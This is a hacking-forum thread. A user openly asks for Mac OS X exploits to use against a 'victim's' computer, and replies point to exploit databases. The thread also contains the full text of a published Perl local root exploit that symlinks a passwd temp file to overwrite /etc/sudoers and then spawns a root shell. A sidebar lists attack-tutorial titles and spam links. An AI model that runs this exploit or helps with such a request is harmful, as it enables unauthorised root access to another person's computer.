Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
http www supplements24x7 com velofel australia au
0
Replies
56 min ago -
Forum Thread:
health2wealthclub.Com/Trim-Pill-Keto/
0
Replies
1 hr ago -
Forum Thread:
www.prohealthpedia.com/Male-Ultracore-Review/
0
Replies
4 hrs ago -
Forum Thread:
http://thesupplementcop.com/plant-pure-turmeric-cbd/
0
Replies
5 hrs ago -
Forum Thread:
http://thesupplementcop.com/plant-pure-turmeric-cbd/
0
Replies
7 hrs ago -
Forum Thread:
Bionatrol CBD
0
Replies
8 hrs ago -
How to:
HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide]
134
Replies
14 hrs ago -
Forum Thread:
Wlan Rename After Update / Upgrade in Kali Linux
0
Replies
1 day ago -
How to:
Embed MSF Payload in Original APK Files | Part #1 - Using TheFatRAT
19
Replies
1 day ago -
Forum Thread:
Https Site in My Browser Automatically Downgrade into Http or Site Not Open..Am I Hacked .
1
Replies
1 day ago -
Forum Thread:
Kali Linux Initramfs Boot Error
0
Replies
1 day ago -
Forum Thread:
I Want to Hack a Facebook Account.
9
Replies
2 days ago -
Forum Thread:
How to Hack Router Password to Access Router Control Panel?
6
Replies
2 days ago -
Forum Thread:
How to Hack an Android Device with Only a Ip Adress
36
Replies
3 days ago -
Forum Thread:
My Instagram Account Has Been Hacked
0
Replies
3 days ago -
Forum Thread:
Deauth Tutorial?
5
Replies
4 days ago -
Forum Thread:
Bruteforcing Social Media Passwords Using Python
0
Replies
4 days ago -
How to:
Install Metasploit Framework on Android | Part #1 - in TermuX
78
Replies
4 days ago -
Forum Thread:
Armitage Can't Show "Attack" Menu in Host
4
Replies
5 days ago -
Forum Thread:
Mobile SSH Connection Refused
0
Replies
5 days ago
-
How To:
Spy on Traffic from a Smartphone with Wireshark
-
How To:
Get Root Filesystem Access via Samba Symlink Traversal
-
How To:
Use Hash-Identifier to Determine Hash Types for Password Cracking
-
How To:
Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
-
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
Hack Like a Pro:
How to Hack Facebook (Facebook Password Extractor)
-
How To:
Top 10 Things to Do After Installing Kali Linux
-
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
Android for Hackers:
How to Turn an Android Phone into a Hacking Device Without Root
-
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To:
Hack MacOS with Digispark Ducky Script Payloads
-
How To:
Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To:
Brute-Force Nearly Any Website Login with Hatch
-
How To:
Find Anyone's Private Phone Number Using Facebook
-
How To:
Get Root with Metasploit's Local Exploit Suggester
-
Hack Like a Pro:
How to Crack Passwords, Part 1 (Principles & Technologies)
-
How To:
Securely Sniff Wi-Fi Packets with Sniffglue
-
How To:
Hack Android Using Kali (Remotely)
-
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts